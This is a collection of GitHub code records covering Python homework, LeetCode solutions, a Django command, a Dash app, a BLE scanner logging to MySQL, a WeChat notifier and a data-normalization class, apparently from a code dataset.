get_key(d, value):\n for k, v in d.items():\n if v == value:\n return k\n\n\ndef find_shelf(n_of_document):\n for element in directories.values():\n if n_of_document in element:\n return get_key(directories, element)\n return 'Cannot find document'\n\n\ndef add_person(document_number, type_document, name_owner, shelf_number):\n documents.append({'type': type_document, 'number': document_number, 'name': name_owner})\n if shelf_number in directories.keys():\n directories[shelf_number].append(document_number)\n else:\n directories[shelf_number] = []\n directories[shelf_number].append(document_number)\n\n\nwhile True:\n com = input('\\nEnter command: \\np - search person by number of document\\nl - list\\nls - list shelves\\ns - shelf\\na - add\\nq - exit\\n')\n if com == 'p':\n document_number = input('Enter document number: ')\n print(people(document_number))\n elif com == 'l':\n print_list()\n elif com == 'ls':\n print_dir()\n elif com == 's':\n document_number = input('Enter document number: ')\n print('Document on the shelf with number - {}'.format(find_shelf(document_number)))\n elif com == 'a':\n document_number = input('Enter document number: ')\n type_document = input('Enter type of document: ')\n name_owner = input('Enter name of owner: ')\n shelf_number = input('Enter shelf number: ')\n add_person(document_number, type_document, name_owner, shelf_number)\n print('Person added')\n elif com == 'q':\n print('Exit program...')\n break\n else:\n print('Unaviable command!')\n","repo_name":"dzendjo/HomeworkPythonNetology","sub_path":"DZ_Python_def/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13749008823","text":"# Given two strings s and t, return true if t is an anagram of s, and false otherwise.\n# An Anagram is a word or phrase formed by rearranging the letters of a different word or phrase,\n# typically using all the original letters exactly once.\n#\n# Example 1:\n#\n# Input: s = \"anagram\", t = \"nagaram\"\n# Output: true\n# Example 2:\n#\n# Input: s = \"rat\", t = \"car\"\n# Output: false\n#\n# Constraints:\n# 1 <= s.length, t.length <= 5 * 104\n# s and t consist of lowercase English letters.\n# Follow up: What if the inputs contain Unicode characters? How would you adapt your solution to such a case?\n# Solution\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return s == t\n\n# Solution 1 - One HashTable O(N) O(N)\nclass Solution(object):\n def isAnagram(self, s, t):\n d = {}\n for i in s:\n d[i] = d.get(i, 0) + 1\n for i in t:\n d[i] = d.get(i, 0) - 1\n for i in d:\n if d[i] != 0:\n return False\n return True\n# Solution 2 - Two HashTable O(N) O(N)\nclass Solution(object):\n def isAnagram(self, s, t):\n if len(s) != len(t):\n return False\n d1, d2 = {}, {}\n for i in s:\n if i not in d1:\n d1[i] = 1\n else:\n d1[i] += 1\n for i in t:\n if i not in d2:\n d2[i] = 1\n else:\n d2[i] += 1\n return d1 == d2\n# Solution 3 - Similar Sorting O(N log(N)) O(N)\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return sorted(s) == sorted(t)\n# Solution 4 - One Liner O(N**2) O(N)\nclass Solution(object):\n def isAnagram(self, s, t):\n if len(s) != len(t):\n return False\n return all(s.count(i) == t.count(i) for i in t)","repo_name":"kaluginpeter/Algorithms_and_structures_tasks","sub_path":"Python_Solutions/LeetCode/Easy/242._Valid_Anagram.py","file_name":"242._Valid_Anagram.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"2886589839","text":"# ============================================\n# Title: Exercise 9.2\n# Author: Professor Krasso\n# Date: 9 May 2022\n# Modified By: Joel Hartung\n# Description: hartung-user-service.py\n# Code Attribution: Code from the Exercise 9.2 document\n# ============================================\n\n\n# import statements\nfrom pymongo import MongoClient\nimport pprint\nimport datetime\n\n# connect to local MongoDB instance\nclient = MongoClient('localhost', 27017)\ndb = client.web335\n\n# create a new user document\nuser = {\n \"first_name\": \"Jean-Claude\",\n \"last_name\": \"Van Damme\",\n \"email\": \"jcvd@mail.com\",\n \"employee_id\": \"00000001\",\n \"date_created\": datetime.datetime.utcnow()\n}\n\n# insert new user document\nuser_id = db.users.insert_one(user).inserted_id\n\n# output auto-generated user_id\nprint(user_id)\n\n# query users collection using \"find_one()\" method & print returned document\npprint.pprint(db.users.find_one({\"employee_id\": \"00000001\"}))\n","repo_name":"jhartung/web-335","sub_path":"week-9/hartung-user-service.py","file_name":"hartung-user-service.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38991159285","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n self.res = []\n def findBst(node, target):\n if not node:\n return\n if node.val == target:\n self.res.append(node)\n return\n elif node.val > target:\n self.res.append(node)\n findBst(node.left, target)\n else:\n self.res.append(node)\n findBst(node.right, target)\n findBst(root, q.val)\n arr = self.res\n self.res = []\n findBst(root, p.val)\n x, y = len(arr), len(self.res)\n for i in range(min(x, y)):\n if arr[i].val != self.res[i].val:\n break\n abss = arr[i]\n return abss","repo_name":"amanz55/a2sv_competitiveprogramming","sub_path":"235-lowest-common-ancestor-of-a-binary-search-tree/235-lowest-common-ancestor-of-a-binary-search-tree.py","file_name":"235-lowest-common-ancestor-of-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20346836381","text":"from typing import Optional, Union\n\nimport database\nfrom utils import language\nfrom . import local, online\nfrom .entry import ChineseDictEntry, EnglishDictEntry\n\n\nclass Dictionary:\n def __init__(self, local_only=False, db_feedback=True):\n self.local_only = local_only\n self.db_feedback = db_feedback\n self.database = database.get_default_database()\n\n def query_english_word(self, word: str) -> Optional[EnglishDictEntry]:\n entry = local.query_english_word(word)\n if entry is not None or self.local_only:\n return entry\n\n entry = online.query_english_word(word)\n if entry is None:\n return None\n\n return entry\n\n def query_chinese_word(self, word: str) -> Optional[ChineseDictEntry]:\n entry = local.query_chinese_word(word)\n if entry is not None or self.local_only:\n return entry\n\n entry = online.query_chinese_word(word)\n if entry is None:\n return None\n\n return entry\n\n def query_word(self, word: str) -> Optional[Union[ChineseDictEntry, EnglishDictEntry]]:\n if language.get_language(word) == language.Lang.CHINESE:\n entry = self.query_chinese_word(word)\n if entry is not None and self.db_feedback:\n self.database.insert_chinese_entry(entry)\n elif language.get_language(word) == language.Lang.ENGLISH:\n entry = self.query_english_word(word)\n if entry is not None and self.db_feedback:\n self.database.insert_english_entry(entry)\n\n return entry\n","repo_name":"Kienyew/Skimmed-Wudao","sub_path":"src/dictionary/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30850683970","text":"from collections import defaultdict\n\n\nclass MetadataMixin(object):\n \"\"\"\n This mixin adds metadata functionality to the standard error bundle.\n Including this in the error bundle allows the app to collect and process\n metadata during the validation process.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n self.resources = {}\n self.pushable_resources = {}\n self.final_context = None\n\n self.metadata = {}\n\n self.feature_profile = set()\n self.feature_usage = defaultdict(list)\n\n super(MetadataMixin, self).__init__(*args, **kwargs)\n\n def get_resource(self, name):\n \"\"\"Retrieve an object that has been stored by another test.\"\"\"\n\n if name in self.resources:\n return self.resources[name]\n elif name in self.pushable_resources:\n return self.pushable_resources[name]\n else:\n return False\n\n def get_or_create(self, name, default, pushable=False):\n \"\"\"Retrieve an object that has been stored by another test, or create\n it if it does not exist.\n\n \"\"\"\n\n if name in self.resources:\n return self.resources[name]\n if name in self.pushable_resources:\n return self.pushable_resources[name]\n else:\n return self.save_resource(name, default, pushable=pushable)\n\n def save_resource(self, name, resource, pushable=False):\n \"\"\"Save an object such that it can be used by other tests.\"\"\"\n\n if pushable:\n self.pushable_resources[name] = resource\n else:\n self.resources[name] = resource\n\n return resource\n\n def _extend_json(self):\n \"\"\"Output the metadata as part of the main JSON blob.\"\"\"\n extension = super(MetadataMixin, self)._extend_json() or {}\n extension.update(metadata=self.metadata,\n feature_profile=list(self.feature_profile),\n feature_usage=dict(self.feature_usage))\n return extension\n","repo_name":"wanmmyjs/app-validator","sub_path":"appvalidator/errorbundle/metadatamixin.py","file_name":"metadatamixin.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"28683232462","text":"import logging\n\nfrom django.core.management import BaseCommand\n\nfrom posts.models.post import Post\nfrom tags.models import Tag, UserTag\n\nlog = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = \"Join two tags into the first one (migrating all posts and users)\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"--first\", type=str, required=True)\n parser.add_argument(\"--second\", type=str, required=True)\n\n def handle(self, *args, **options):\n first_tag_code = options[\"first\"]\n second_tag_code = options[\"second\"]\n\n first_tag = Tag.objects.filter(code=first_tag_code).first()\n if not first_tag:\n self.stdout.write(f\"Tag '{first_tag}' does not exist\")\n return\n\n second_tag = Tag.objects.filter(code=second_tag_code).first()\n if not second_tag:\n self.stdout.write(f\"Tag '{second_tag_code}' does not exist\")\n return\n\n Post.objects.filter(collectible_tag_code=second_tag.code).update(collectible_tag_code=first_tag.code)\n for user_tag in UserTag.objects.filter(tag=second_tag):\n try:\n user_tag.tag = first_tag\n user_tag.save()\n except Exception as ex:\n self.stdout.write(f\"UserTag '{user_tag.user_id}' is duplicate. Skipped. {ex}\")\n\n Tag.objects.filter(code=second_tag.code).delete()\n\n self.stdout.write(\"Done 🥙\")\n","repo_name":"vas3k/vas3k.club","sub_path":"tags/management/commands/join_tags.py","file_name":"join_tags.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":685,"dataset":"github-code","pt":"75"} +{"seq_id":"5463246759","text":"##This program demonstrates random numbers using a rock, paper, scissors game.\r\n\r\n#imports\r\nfrom random import randint\r\n\r\n#declare win counters\r\nuWins = 0\r\ncWins = 0\r\nties = 0 \r\n\r\n#print game instructions\r\nprint(\"Rock, Paper, Scissors!\\n1 = Rock\\n2 = Paper\\n3 = Scissors\\n\")\r\n\r\n\r\n##This function calculates the winner of rock, paper, scissors\r\ndef winner(u, c):\r\n winner = 0\r\n if(u == c):\r\n print(\"It's a tie!\")\r\n winner = 0\r\n elif(u == 1 and c == 2):\r\n print(\"Paper wraps rock, computer wins!\")\r\n winner = 2\r\n elif(u == 2 and c == 1):\r\n print(\"Paper wraps rock, user wins!\")\r\n winner = 1\r\n elif(u == 1 and c == 3):\r\n print(\"Rock smashes scissors, user wins!\")\r\n winner = 1\r\n elif(u == 3 and c == 1):\r\n print(\"Rock smashes scissors, computer wins!\")\r\n winner = 2\r\n elif(u == 2 and c == 3):\r\n print(\"Scissors cut paper, computer wins!\")\r\n winner = 2\r\n elif(u == 3 and c == 2):\r\n print(\"Scissors cut paper, user wins!\")\r\n winner = 1\r\n return winner\r\n \r\n\r\n#gameplay\r\nagain = 'y'\r\nwhile(again.lower() == 'y'):\r\n #get choices\r\n userChoice = int(input(\"Enter your choice: \"))\r\n compChoice = randint(1, 3)\r\n\r\n #calulate wins\r\n result = winner(userChoice, compChoice)\r\n if(result == 0): ties += 1\r\n elif(result == 1): uWins += 1\r\n elif(result == 2): cWins += 1\r\n\r\n #print scoreboard\r\n print(\"Ties: \" + str(ties))\r\n print(\"User wins: \" + str(uWins))\r\n print(\"Computer wins: \" + str(cWins))\r\n\r\n #ask if continue\r\n again = str(input(\"\\nPlay again? (y/n) \"))\r\n\r\nprint(\"Bye!\")\r\n \r\n \r\n","repo_name":"ari789/rock-paper-scissors","sub_path":"RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2882156719","text":"'''\nCreated on Jan 24, 2018\n\n@author: shifa\n'''\n#nested loops\n#can use one or more loops inside any\n#while or for loops\n\n#can put any type of loop inside any\n#other type of loop \n\n#nested for loop to display multiplication\n#tables from 1-10\n\n#import sys\n\nfor i in range(1,11):\n for j in range(1,11):\n k = i * j\n print(k, end =' ')\n print()\n\n\n#print(list(range(1,11))) \n#prints 1-10\n\n#end=' ' appends a space instead of \n#default new line\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shifalik/practice","sub_path":"shifali/test30.py","file_name":"test30.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69984018804","text":"from dash import Dash, html, dcc\nimport dash\n\napp = Dash(__name__, use_pages=True)\n\napp.layout = html.Div([\n\thtml.H1('Cell Imaging Analysis Pipeline'),\n\n html.Div(\n [\n html.Div(\n dcc.Link(\n f\"{page['name']}\", href=page[\"relative_path\"]\n )\n )\n for page in dash.page_registry.values()\n ]\n ),\n\n\tdash.page_container\n])\n\nif __name__ == '__main__':\n\tapp.run_server(debug=True)","repo_name":"nmra-abarthmaron/cell-imaging","sub_path":"gui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21082075253","text":"from math import *\r\nimport sympy as sp \r\nimport matplotlib as mat\r\n\r\nx,y=sp.symbols('x y')\r\n# str_ecuacion = input(\"Ingrese la ecuacion: \\n\")\r\n# funcion= sp.sympify(str_ecuacion)\r\n\r\n\r\n\r\n\r\ndef f(x): \r\n b= funcion.free_symbols\r\n var=b.pop()\r\n valor = funcion.evalf(subs={var:x})\r\n\r\n return valor\r\n\r\ndef Derivada(x):\r\n\r\n h=0.0001 \r\n\r\n uno=float((f(x+h)-f(x))/h)\r\n #dos=float((f(x+h)-2*f(x)+f(x-h))/h**2)\r\n\r\n return uno\r\n # print(\"valor segunda derivada\",dos)\r\n\r\ndef newton_raphson(x,E,I):\r\n I+=1\r\n MT=float(Derivada(x))#penidente de la recta tangente de la funcion \r\n Xr=x-(f(x)/MT) #Intercepto en el eje X\r\n global Error\r\n Error = float(f(Xr))\r\n V=[Xr,I,Error]\r\n if(I>50):\r\n return [\"NO ENCONTRADO\",I]\r\n else:\r\n if(f(Xr)>=0):\r\n if(f(Xr)<=E):\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return V\r\n else:\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return newton_raphson(Xr,E,I)\r\n else:\r\n if(-f(Xr)<=E):\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return V\r\n else:\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return newton_raphson(Xr,E,I) \r\n\r\n\r\n\r\n\r\ndef Menu(f,valor,e):\r\n global funcion\r\n x,y=sp.symbols('x y')\r\n funcion=sp.sympify(f)\r\n Opcion=valor\r\n ll = Opcion.replace(\"pi\",str(pi))\r\n opcion = float (sp.sympify(ll))\r\n \r\n Er=float(e)\r\n iteraciones=0\r\n # print('{:^10}{:^10}{:^10}{:^10}{:^10}{:^10}'.format(\"I\",\"X1\",\"f(Xi)\",\"f'(Xi)\",\"X2\",\"Error\"))\r\n\r\n Z=newton_raphson(opcion,Er,iteraciones)\r\n # z=Z[0]\r\n # y=Z[1]\r\n \r\n # print(\"La intercepcion en el eje X es: \",z,\"a las \",y,\" iteraciones\")\r\n return Z\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n# Menu()","repo_name":"Orozquiano/computacionGrafica","sub_path":"newton_raphson.py","file_name":"newton_raphson.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70525660723","text":"#coding=utf-8\n\"\"\"\n@Author : Yuan Meng\n@Time : 2023/2/23 19:13\n@Software: PyCharm\nCtrl+shift+v 历史粘贴版\nctrl+alt+空格 自动补全\nctrl+alt+D 分屏\nCtrl+/ 快速注释\n\n\"\"\"\nimport re\nimport urllib.request\n\nfrom PIL import Image\nfrom aip import AipOcr\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\nfrom email.mime.text import MIMEText\nimport json,time,smtplib\nimport urllib.parse\nfrom threading import Lock, Thread\nimport requests\nimport sys\nimport traceback\nfrom datetime import datetime\n\nglobal wechat_lock\nwechat_lock = Lock()\n\n# 这里可以设置UIDS, 多个人可同时接收 [袁猛,李良,蔡姻,张斯杰,罗柳,王凯]\n# UIDS = ['UID_j0EdePPCONxX3OszmdyvwSYknX8m','UID_7zDNlQLoP6BwAJFJ6dRCuy9EQ1fp','UID_dxNzj6aupA6Q4QZrDkwmCcDLMX2e','UID_nSMBON6ECkBvdpOC3QeUfIUb7tJX','UID_pyB3i43mzt2LctecgCBZWBz035GZ','UID_IJVLOOwS4AtmaaydQzjBPoQUeBw0']\nUIDS = ['UID_j0EdePPCONxX3OszmdyvwSYknX8m']\n\nAPP_TOKEN = 'AT_wW7eEobXR61htcs4zw6HIchK1yUaSx8L'\n# AT_zueTbAm3qrDJy2BvWtYwJwqVgRjGZIhF\n\nclass wechat_thread(Thread):\n \"\"\"\n 采用线程方式,不阻塞\n \"\"\"\n\n def __init__(self, uids: list, content: str, topic_ids: list = [], url: str = '', app_token=''):\n\n # text:消息标题,最长为256,必填。\n # desp:消息内容,最长64Kb,可空,支持MarkDown。\n\n super(wechat_thread, self).__init__(name=\"wechat_thread\")\n self.request_url = \"http://wxpusher.zjiecode.com/api/send/message\"\n self.uids = uids\n self.content = content\n self.topic_ids = topic_ids\n self.url = url\n self.lock = wechat_lock\n self.app_token = app_token if len(app_token) > 0 else APP_TOKEN\n\n def run(self):\n if self.content is None or len(self.content) == 0:\n return\n params = {}\n params['appToken'] = self.app_token\n params['content'] = self.content\n params['contentType'] = 1\n params['topicIds'] = self.topic_ids\n params['uids'] = self.uids\n params['url'] = self.url\n\n # 发送请求\n try:\n response = requests.post(self.request_url, json=params).json()\n if not response.get('success', False):\n print(response)\n except Exception as e:\n print(\"{} wechat_thread sent failed! ex:{},trace:{}\".format(datetime.now(), str(e), traceback.format_exc()),\n file=sys.stderr)\n return\n\n print(\"未打卡人员微信通知成功!\")\n\ndef send_wx_msg(*args, **kwargs):\n \"\"\"\n 发送微信Msg\n :param content: 发送内容\n :return:\n \"\"\"\n content = kwargs.get('content', None)\n if content is None:\n if len(args) == 0:\n return\n content = args[0]\n if len(content) == 0:\n return\n\n\n if not isinstance(content, str):\n if isinstance(content, dict):\n content = '{}'.format(print(content))\n else:\n content = str(content)\n\n uids = kwargs.get('uids', [])\n # 没有配置的话,使用缺省UID\n if len(uids) == 0:\n uids.extend(UIDS)\n\n app_token = kwargs.get('app_token')\n\n t = wechat_thread(uids=UIDS, content=content, app_token=APP_TOKEN)\n t.daemon = False\n t.start()\n\ntext = '通知:'\nsend_wx_msg(text)","repo_name":"yuan1093040152/SeleniumTest","sub_path":"python3Test/Test/test012.py","file_name":"test012.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27394623001","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport argparse\nimport binascii\nimport os\nimport sys\nimport time\nimport datetime\nimport pyshark\nimport subprocess\nimport MySQLdb\nfrom bluepy import btle\n\n\nif os.getenv('C', '1') == '0':\n ANSI_RED = ''\n ANSI_GREEN = ''\n ANSI_YELLOW = ''\n ANSI_CYAN = ''\n ANSI_WHITE = ''\n ANSI_OFF = ''\nelse:\n ANSI_CSI = \"\\033[\"\n ANSI_RED = ANSI_CSI + '31m'\n ANSI_GREEN = ANSI_CSI + '32m'\n ANSI_YELLOW = ANSI_CSI + '33m'\n ANSI_CYAN = ANSI_CSI + '36m'\n ANSI_WHITE = ANSI_CSI + '37m'\n ANSI_OFF = ANSI_CSI + '0m'\n\nclass ScanPrint(btle.DefaultDelegate):\n\n def __init__(self, opts):\n btle.DefaultDelegate.__init__(self)\n self.opts = opts\n\n def handleDiscovery(self, dev, isNewDev, isNewData):\n if dev.getValueText(9) is not None:\n if 'TAG' in dev.getValueText(9):\n if isNewDev:\n status = \"new\"\n elif isNewData:\n if self.opts.new:\n return\n status = \"update\"\n else:\n if not self.opts.all:\n return\n status = \"old\"\n\n if dev.rssi < self.opts.sensitivity:\n return\n\n print(datetime.datetime.now().strftime(\"%A, %d %B %Y %I:%M%p\") + ' | Device : %s (%s), %d dBm' %\n (ANSI_WHITE + dev.addr + ANSI_OFF,\n dev.getValueText(9),\n dev.rssi))\n if not dev.scanData:\n print('\\t(no data)')\n print\n else:\n return\n\n\ndef connect(devices):\n print(ANSI_YELLOW + \"Connecting to Devices...\" + ANSI_OFF)\n\n for d in devices:\n if d.getValueText(9) == 'iTAG':\n if d.connectable:\n print(\" Connecting to\", ANSI_WHITE + d.addr + ANSI_OFF + \":\")\n dev = btle.Peripheral(d)\n time.sleep(1)\n dev.disconnect()\n time.sleep(2)\n\n\ndef scan():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-i', '--hci', action='store', type=int, default=0,\n help='Interface number for scan')\n parser.add_argument('-t', '--timeout', action='store', type=int, default=60,\n help='Scan delay, 0 for continuous')\n parser.add_argument('-s', '--sensitivity', action='store', type=int, default=-128,\n help='dBm value for filtering far devices')\n parser.add_argument('-d', '--discover', action='store_true',\n help='Connect and discover service to scanned devices')\n parser.add_argument('-a', '--all', action='store_true',\n help='Display duplicate adv responses, by default show new + updated')\n parser.add_argument('-n', '--new', action='store_true',\n help='Display only new adv responses, by default show new + updated')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Increase output verbosity')\n arg = parser.parse_args(sys.argv[1:])\n\n btle.Debugging = arg.verbose\n\n #get Raspberry Pi Mac Address\n bus_rpi_mac = subprocess.check_output(\n [\"cat\", \"/sys/class/bluetooth/hci0/address\"])\n bus_rpi_mac = bus_rpi_mac[:-1]\n\n #connect to Mysql Database\n db = MySQLdb.connect(host=\"52.77.27.5\",\n port=12345,\n user=\"schoolbus\",\n passwd=\"password4schoolbus\",\n db=\"schoolbus\")\n cursor = db.cursor()\n\n while True:\n\n print(\"\\n\" + ANSI_RED + \"Scanning for devices...\" + ANSI_OFF)\n scanner = btle.Scanner(arg.hci).withDelegate(ScanPrint(arg))\n devices = scanner.scan(arg.timeout)\n\n itag_amount = 0\n\n for d in devices:\n if d.getValueText(9) is not None:\n if 'TAG' in d.getValueText(9):\n itag_amount += 1\n cursor.execute(\"INSERT INTO school_bus_scan_data (rpi_mac, itag_mac,time, rssi) VALUES (%s,%s,%s,%s)\", (\n bus_rpi_mac, d.addr, datetime.datetime.now(), d.rssi))\n print('insert complete')\n db.commit()\n\n print('Device Found : %s \\n', itag_amount)\n\n if arg.discover:\n connect(devices)\n\n\nif __name__ == '__main__':\n scan()\n","repo_name":"BankyKmitl/Intern_SchoolBus","sub_path":"blescan.py","file_name":"blescan.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20727554768","text":"# a = 10\n# b = 2\n# def function():\n# print(a)\n# print(b)\n# function()\n\n# a = 9\n# def function ():\n# print(a)\n# b = 2\n\n# print(b)\n# print(a)\n# function()\n\n\n# def red(): \n# a = 2\n# B = 1\n# print(a)\n# print(B)\n\n# def blue():\n# nyno1 = 10\n# b = 2\n# print(nyno1 * b)\n# print(b)\n# blue()\n \n# def black():\n# nyno =4\n# nyno1 =3\n# print(nyno/nyno1)\n# black()\n\n\n# red()\n\n\n# a = 2\n# def function():\n# global a\n# a = 10\n# print(a)\n# function()\n# a\n\n\n# def red():\n# a= 1\n\n# def blue():\n# nonlocal a\n# a = 2\n# b = 3\n# print(a)\n# print(b)\n\n\n# blue()\n# print(b)\n\n# red()\n\n\n\na = \"Good\"\nb = \"Morning\"\nprint( a +\" \"+ b )","repo_name":"Nyneshwar8/git_py_training","sub_path":"DAY/Variablefunction.PY","file_name":"Variablefunction.PY","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"16995715082","text":"def solution(n, info):\n answer = []\n stack = [(n, 0, '', 0)]\n best_score = 0\n \n while stack:\n num_arrow, cur_pos, score_board, win = stack.pop()\n if cur_pos == len(info):\n if best_score < win:\n best_score = win\n answer = [score_board]\n elif best_score != 0 and best_score == win:\n answer.append(score_board)\n continue\n \n if num_arrow >= info[cur_pos] + 1:\n stack.append((num_arrow - info[cur_pos] - 1 , cur_pos+1, score_board + str(info[cur_pos] + 1), win + (10 - cur_pos)))\n \n score = (10 - cur_pos) if info[cur_pos] > 0 else 0\n stack.append((num_arrow, cur_pos+1, score_board + ('0' if cur_pos < len(info)-1 else str(num_arrow)), win - score))\n\n if not answer:\n return [-1]\n \n return list(map(int, sorted([a[::-1] for a in answer])[-1][::-1]))\n","repo_name":"sangmandu/Baejoon","sub_path":"프로그래머스/lv2/92342. 양궁대회/양궁대회.py","file_name":"양궁대회.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2059969051","text":"import numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\n\nclass Data(object):\n\n def __init__(self, InputData, system):\n\n self.Type = InputData.data_type\n try:\n self.data_preproc_type = InputData.data_preproc_type\n except:\n self.data_preproc_type = None\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def transform_normalization_data(self):\n\n if (self.trans_fun):\n for ifun, fun in enumerate(self.trans_fun):\n vars_list = self.trans_fun[fun]\n\n for ivar, var in enumerate(self.input_vars):\n if var in vars_list:\n if (fun == 'log10'):\n self.norm_input[var] = np.log10(self.norm_input[var])\n elif (fun == 'log'):\n self.norm_input[var] = np.log(self.norm_input[var])\n\n for ivar, var in enumerate(self.output_vars):\n if var in vars_list:\n if (fun == 'log10'):\n self.norm_output[var] = np.log10(self.norm_output[var])\n elif (fun == 'log'):\n self.norm_output[var] = np.log(self.norm_output[var])\n \n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def normalize_input_data(self, all_data):\n\n for i, now_data in enumerate(all_data):\n for data_id, xyi_data in now_data.items():\n if (data_id != 'res'):\n x_data = xyi_data[0]\n\n if (self.data_preproc_type == None) or (self.data_preproc_type == 'std') or (self.data_preproc_type == 'auto'):\n all_data[i][data_id][0] = (x_data - self.stat_input['mean'].to_numpy()) / self.stat_input['std'].to_numpy()\n\n elif (self.data_preproc_type == '0to1'):\n all_data[i][data_id][0] = (x_data - self.stat_input['min'].to_numpy()) / (self.stat_input['max'].to_numpy() - self.stat_input['min'].to_numpy())\n\n elif (self.data_preproc_type == 'range'):\n all_data[i][data_id][0] = (x_data) / (self.stat_input['max'].to_numpy() - self.stat_input['min'].to_numpy())\n\n elif (self.data_preproc_type == '-1to1'):\n all_data[i][data_id][0] = 2. * (x_data - self.stat_input['min'].to_numpy()) / (self.stat_input['max'].to_numpy() - self.stat_input['min'].to_numpy()) - 1.\n \n elif (self.data_preproc_type == 'pareto'):\n all_data[i][data_id][0] = (x_data - self.stat_input['mean'].to_numpy()) / np.sqrt(self.stat_input['std'].to_numpy())\n\n elif (self.data_preproc_type == 'log') or (self.data_preproc_type == 'log10'):\n all_data[i][data_id][0] = (x_data - self.stat_input['min'].to_numpy()+1e-10)\n \n # # PCA\n # all_data[i][data_id][1] = (x_data - self.system.C) / self.system.D\n \n return all_data\n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def normalize_output_data(self, all_data):\n\n for i, now_data in enumerate(all_data):\n for data_id, xyi_data in now_data.items():\n if (data_id != 'res'):\n y_data = xyi_data[1]\n\n if (self.data_preproc_type == None) or (self.data_preproc_type == 'std') or (self.data_preproc_type == 'auto'):\n all_data[i][data_id][1] = (y_data - self.stat_output['mean'].to_numpy()) / self.stat_output['std'].to_numpy()\n\n elif (self.data_preproc_type == '0to1'):\n all_data[i][data_id][1] = (y_data - self.stat_output['min'].to_numpy()) / (self.stat_output['max'].to_numpy() - self.stat_output['min'].to_numpy())\n\n elif (self.data_preproc_type == 'range'):\n all_data[i][data_id][1] = (y_data) / (self.stat_output['max'].to_numpy() - self.stat_output['min'].to_numpy())\n\n elif (self.data_preproc_type == '-1to1'):\n all_data[i][data_id][1] = 2. * (y_data - self.stat_output['min'].to_numpy()) / (self.stat_output['max'].to_numpy() - self.stat_output['min'].to_numpy()) - 1.\n\n elif (self.data_preproc_type == 'pareto'):\n all_data[i][data_id][1] = (y_data - self.stat_output['mean'].to_numpy()) / np.sqrt(self.stat_output['std'].to_numpy())\n\n elif (self.data_preproc_type == 'log'):\n all_data[i][data_id][1] = np.log(y_data - self.stat_output['min'].to_numpy()+1e-10)\n\n elif (self.data_preproc_type == 'log10'):\n all_data[i][data_id][1] = np.log10(y_data - self.stat_output['min'].to_numpy()+1e-10)\n\n # # PCA\n # all_data[i][data_id][1] = (y_data - self.system.C) / self.system.D\n \n return all_data\n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # 